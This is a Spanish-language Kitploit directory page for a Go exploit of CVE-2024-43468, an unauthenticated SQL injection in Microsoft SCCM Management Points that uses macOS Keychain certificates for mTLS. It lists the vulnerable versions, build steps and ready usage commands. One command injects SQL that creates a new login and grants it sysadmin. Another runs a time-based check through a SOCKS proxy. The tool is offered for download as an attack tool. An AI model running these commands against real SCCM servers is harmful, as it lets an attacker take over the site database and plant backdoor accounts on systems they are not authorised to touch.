Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-43468_mTLS_go — CVE-2024-43468 Exploit de inyección SQL en SCCM (certificado de cliente mTLS no extraíble de la versión del llavero de MacOS) | Kitploit
Herramientas/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónRed Teaming
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 Exploit de inyección SQL en SCCM (certificado de cliente mTLS no extraíble de la versión del llavero de MacOS)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
32hace 1 añoAún no revisado

CVE-2024-43468 Exploit de Inyección SQL de SCCM (versión de certificados cliente mTLS desde el llavero de macOS)

Implementación en Go del exploit CVE-2024-43468 que utiliza el Llavero de macOS para autenticación mTLS (sin necesidad de exportar claves del llavero).

Adicionalmente:

  • Se agregó soporte de proxy para no usar proxychains problemáticos.
  • Se agregó get_cert_name.py para obtener el Common Name del certificado (sí, puedes hacerlo manualmente desde la GUI de Acceso a Llaveros)
  • Se agregó mucha depuración para ver lo que sucede

Basado en:

  • exploit original en Python
  • ejemplo de cliente Go mTLS

Descripción

Explota inyecciones SQL no autenticadas en Microsoft Configuration Manager (ConfigMgr / SCCM) que permite a un atacante con acceso de red a un Punto de Administración ejecutar consultas SQL arbitrarias en la base de datos del sitio.

Versiones vulnerables:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

Instalación

root@kitploit:~
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Build
go build -o sccm

Uso

root@kitploit:~
# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

Parámetros

  • -t : URL objetivo (obligatorio)
  • -sql : Consulta SQL a ejecutar (obligatorio)
  • -cn : Common Name del certificado en el Llavero de macOS (obligatorio)
  • -proxy : Dirección del proxy SOCKS5 (predeterminado: vacío)

Requisitos

  • macOS (para integración con Llavero)
  • Go 1.16+
  • Certificado de cliente en el Llavero de macOS
  • opcional: proxy SOCKS5

Referencias

  • Aviso de Microsoft
  • Aviso de Synacktiv
  • Ejemplo de cliente Go mTLS
Descargar herramienta